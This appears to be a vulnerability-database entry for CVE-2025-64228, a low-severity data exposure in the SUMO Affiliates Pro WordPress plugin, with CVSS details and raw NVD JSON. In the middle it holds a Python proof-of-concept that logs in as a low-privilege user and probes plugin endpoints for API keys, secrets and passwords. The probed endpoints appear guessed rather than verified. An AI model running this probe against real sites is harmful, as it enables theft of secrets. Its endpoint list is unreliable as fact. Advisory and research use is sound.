Security Vulnerability Report
中文
CVE-2025-64228 CVSS 4.3 MEDIUM

CVE-2025-64228

Published: 2025-10-29 09:15:44
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in FantasticPlugins SUMO Affiliates Pro affs allows Retrieve Embedded Sensitive Data.This issue affects SUMO Affiliates Pro: from n/a through <= 11.0.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

SUMO Affiliates Pro <= 11.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-64228 PoC - SUMO Affiliates Pro Sensitive Data Exposure # Target: WordPress site with SUMO Affiliates Pro plugin <= 11.0.0 target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # Authentication with low privilege account login_url = f'{target}/wp-login.php' wp_session = requests.Session() # Login credentials (low privilege user) login_data = { 'log': 'attacker_username', 'pwd': 'attacker_password', 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } # Login to WordPress response = wp_session.post(login_url, data=login_data, cookies={'wordpress_test_cookie': 'WP+Cookie+check'}) if 'wordpress_logged_in' not in wp_session.cookies: print('[-] Login failed') sys.exit(1) print('[+] Logged in with low privilege account') # Exploit sensitive data exposure endpoint # Common vulnerable endpoints in SUMO Affiliates Pro vulnerable_endpoints = [ '/wp-json/affs/v1/affiliates/data', '/wp-admin/admin-ajax.php?action=affs_get_affiliate_data', '/wp-json/wp/v2/users', '/wp-admin/admin-ajax.php?action=affs_fetch_sensitive_info' ] for endpoint in vulnerable_endpoints: url = f'{target}{endpoint}' try: response = wp_session.get(url, timeout=10) if response.status_code == 200 and ('api_key' in response.text or 'secret' in response.text or 'password' in response.text.lower()): print(f'[+] Found sensitive data at: {endpoint}') print(f'[+] Response snippet: {response.text[:500]}') except Exception as e: print(f'[-] Error testing {endpoint}: {e}') print('\n[*] PoC completed. Check output for exposed sensitive information.')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64228", "sourceIdentifier": "[email protected]", "published": "2025-10-29T09:15:44.077", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in FantasticPlugins SUMO Affiliates Pro affs allows Retrieve Embedded Sensitive Data.This issue affects SUMO Affiliates Pro: from n/a through <= 11.0.0."}, {"lang": "es", "value": "Vulnerabilidad de Exposición de Información Sensible del Sistema a una Esfera de Control No Autorizada en FantasticPlugins SUMO Affiliates Pro affs permite Recuperar Datos Sensibles Incrustados. Este problema afecta a SUMO Affiliates Pro: desde n/a hasta menor igual que 11.0.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/affs/vulnerability/wordpress-sumo-affiliates-pro-plugin-11-0-0-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}